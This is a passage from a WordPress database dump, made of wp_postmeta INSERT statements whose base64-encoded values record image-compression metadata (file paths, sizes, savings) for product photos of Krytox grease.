RtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja185NzQwMTczMS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTMyLCJ0aW1lIjoxNDgzNTUwNzgwLCJpZCI6MTk0MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfOTc0MDE3MzEtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfOTc0MDE3MzEtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfOTc0MDE3MzEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEzODQsInRpbWUiOjE0ODM1NTA3ODMsImlkIjoxOTQwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo1ODIsInRpbWUiOjE0ODM1NTA3ODcsImlkIjoxOTQwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTQ1MHgyNjMuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTQ1MHgyNjMuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIyNjMiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTQ1MHgyNjMuanBnIiwicmVkdWN0aW9uIjo4MjAsInRpbWUiOjE0ODM1NTA3OTAsImlkIjoxOTQwfV0='); 
INSERT INTO `wp_postmeta` VALUES (28952, 1939, 'wpfc_optimisation_reduction', '177244'); 
INSERT INTO `wp_postmeta` VALUES (28953, 1939, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LW5ydC1ncmVhc2UuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtbnJ0LWdyZWFzZS5qcGciLCJ3aWR0aCI6MzAwMCwiaGVpZ2h0IjoyMDAwLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LW5ydC1ncmVhc2UuanBnIiwicmVkdWN0aW9uIjoxNzcyMzQsInRpbWUiOjE0ODM1NTA4MDIsImlkIjoiMTkzOSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LW5ydC1ncmVhc2UtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtbnJ0LWdyZWFzZS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1ucnQtZ3JlYXNlLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwODA1LCJpZCI6MTkzOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtbnJ0LWdyZWFzZS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1ucnQtZ3JlYXNlLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LW5ydC1ncmVhc2UtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTA4MDgsImlkIjoxOTM5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1ucnQtZ3JlYXNlLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LW5ydC1ncmVhc2UtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtbnJ0LWdyZWFzZS03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDgxMSwiaWQiOjE5Mzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LW5ydC1ncmVhc2UtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LW5ydC1ncmVhc2UtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1ucnQtZ3JlYXNlLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTA4MTUsImlkIjoxOTM5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1ucnQtZ3JlYXNlLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LW5ydC1ncmVhc2UtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtbnJ0LWdyZWFzZS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDgxOCwiaWQiOjE5Mzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LW5ydC1ncmVhc2UtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtbnJ0LWdyZWFzZS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1ucnQtZ3JlYXNlLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwODIwLCJpZCI6MTkzOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtbnJ0LWdyZWFzZS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1ucnQtZ3JlYXNlLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LW5ydC1ncmVhc2UtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTA4MjMsImlkIjoxOTM5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1ucnQtZ3JlYXNlLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LW5ydC1ncmVhc2UtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtbnJ0LWdyZWFzZS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDgyNiwiaWQiOjE5Mzl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtbnJ0LWdyZWFzZS0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1ucnQtZ3JlYXNlLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LW5ydC1ncmVhc2UtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTA4MjgsImlkIjoxOTM5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LW5ydC1ncmVhc2UtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtbnJ0LWdyZWFzZS00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1ucnQtZ3JlYXNlLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwODMxLCJpZCI6MTkzOX1d'); 
INSERT INTO `wp_postmeta` VALUES (28954, 1938, 'wpfc_optimisation_reduction', '97137'); 
INSERT INTO `wp_postmeta` VALUES (28955, 1938, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXhodC1ncmVhc2Utb2lsLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXhodC1ncmVhc2Utb2lsLmpwZyIsIndpZHRoIjozMDAwLCJoZWlnaHQiOjE5OTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gteGh0LWdyZWFzZS1vaWwuanBnIiwicmVkdWN0aW9uIjo5NzEyNywidGltZSI6MTQ4MzU1MDg0MSwiaWQiOiIxOTM4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gteGh0LWdyZWFzZS1vaWwtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gteGh0LWdyZWFzZS1vaWwtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gteGh0LWdyZWFzZS1vaWwtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTA4NDMsImlkIjoxOTM4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC14aHQtZ3JlYXNlLW9pbC04MDB4NTMyLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC14aHQtZ3JlYXNlLW9pbC04MDB4NTMyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC14aHQtZ3JlYXNlLW9pbC04MDB4NTMyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDg0NywiaWQiOjE5Mzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXhodC1ncmVhc2Utb2lsLTc2OHg1MTEuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXhodC1ncmVhc2Utb2lsLTc2OHg1MTEuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LXhodC1ncmVhc2Utb2lsLTc2OHg1MTEuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwODUwLCJpZCI6MTkzOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gteGh0LWdyZWFzZS1vaWwtMTYwMHgxMDY1LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXhodC1ncmVhc2Utb2lsLTE2MDB4MTA2NS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gteGh0LWdyZWFzZS1vaWwtMTYwMHgxMDY1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDg1NCwiaWQiOjE5Mzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXhodC1ncmVhc2Utb2lsLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXhodC1ncmVhc2Utb2lsLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LXhodC1ncmVhc2Utb2lsLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwODU2LCJpZCI6MTkzOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gteGh0LWdyZWFzZS1vaWwtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gteGh0LWdyZWFzZS1vaWwtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gteGh0LWdyZWFzZS1vaWwtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTA4NTgsImlkIjoxOTM4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC14aHQtZ3JlYXNlLW9pbC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC14aHQtZ3JlYXNlLW9pbC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC14aHQtZ3JlYXNlLW9pbC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDg2MSwiaWQiOjE5Mzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXhodC1ncmVhc2Utb2lsLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXhodC1ncmVhc2Utb2lsLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LXhodC1ncmVhc2Utb2lsLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwODYzLCJpZCI6MTkzOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC14aHQtZ3JlYXNlLW9pbC0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC14aHQtZ3JlYXNlLW9pbC0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC14aHQtZ3JlYXNlLW9pbC0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDg2NiwiaWQiOjE5Mzh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gteGh0LWdyZWFzZS1vaWwtNDUweDI5OS5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gteGh0LWdyZWFzZS1vaWwtNDUweDI5OS5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjI5OSIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gteGh0LWdyZWFzZS1vaWwtNDUweDI5OS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTA4NjgsImlkIjoxOTM4fV0='); 
INSERT INTO `wp_postmeta` VALUES (28956, 1937, 'wpfc_optimisation_reduction', '114265'); 
